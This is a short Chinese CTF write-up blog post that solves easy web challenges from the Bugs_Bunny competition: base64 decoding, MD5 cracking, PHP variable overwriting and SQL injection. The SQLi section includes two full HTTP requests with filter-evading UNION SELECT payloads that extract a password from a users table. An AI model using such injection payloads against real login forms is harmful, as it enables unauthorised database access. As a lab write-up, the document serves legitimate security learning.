(web)Bugs_Bunny_CTF_writeup 部分简单web

  1. Nothing here

QnVnc19CdW5ueXs1MjljNDI5YWJkZTIxNzFkMGEyNTU4NDQ3MmFmODIxN30K

 

Bugs_Bunny{529c429abde2171d0a25584472af8217}

    2.  Encryption

修改agent,得到两个hash,

zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1%2B5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x

 

zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x

 

 

  3.Web100

查看DOM,然后解md5

_
  "6b07fd4ea837c39e1542e1bbca01a224"
 
__
  "20ee80e63596799a1543bc9fd88d8878"
 
___
  "21232f297a57a5a743894a0e4a801fc3"

 

 

看懂这一部分就OK,

tunisia bunny  admin

inininynusutdamba

Bugs_Bunny{inininynusutdamba}

  4. SimplePHP

 

 题目很赞,有个两个关键就是覆盖POST和覆盖原来上面定义的两个变量。

   5. SQLI

 

GET /LQI_X/?username=a'-0-'&password='or/**/1/**/union/**/select/**/'z'/**/order/**/by/**/1--&login=login HTTP/1.1
Host: 34.253.165.46
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

 

 

GET /LQI_X/?username=a'-1-'&password='or/**/0/**/union/**/select/**/(select/**/password/**/from/**/users/**/limit/**/3,1)/**/--&login=login HTTP/1.1
Host: 34.253.165.46
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Bugs_Bunny{SQLi_Easy_I_Dont_Think}

_Easy_I_Dont_Think}}

Bugs_Bunny{SQLi_Easy_!!_I_Dont_Think}

_Easy_I_Dont_Think

username位置过滤比较严苛,在password注入,题目限制比较坑。最后flag我去提交都不对,有毒。

 

posted on 2017-07-31 00:58  _Deen  阅读(694)  评论(0编辑  收藏  举报

导航